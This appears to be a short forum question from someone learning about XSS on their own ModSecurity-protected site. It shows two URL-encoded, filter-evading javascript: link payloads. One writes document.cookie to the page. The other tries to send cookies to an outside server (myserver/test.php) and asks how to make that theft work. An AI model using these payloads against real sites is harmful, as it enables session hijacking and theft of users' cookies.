I am trying to learn about the XSS vulnerability and was testing some payloads on my website (with Mod_Security), but now I'm stuck and I don't know if it was a real vulnerability or a false positive, so here is the payload:
%3Ca+href%3D%22jAvAsCrIpT%26colon%3Bdocument.write%26lpar%3Bdocument.cookie%26rpar%3B%22%3EY%3C%2Fa%3E
The problem is, it just prints the cookies in another page. Is there any way to send those cookies to a "malicious page" and get them? I've tried something like this:
%3Ca+href%3D%22jAvAsCrIpT%26colon%3Bvoid%26lpar%3B(document.location='http://myserver/test.php?c='+escape(document.cookie))%26rpar%3B%22%3EY%3C%2Fa%3E
But no success, so if anyone can shed some light, I would appreciate it.
Thanks in advance!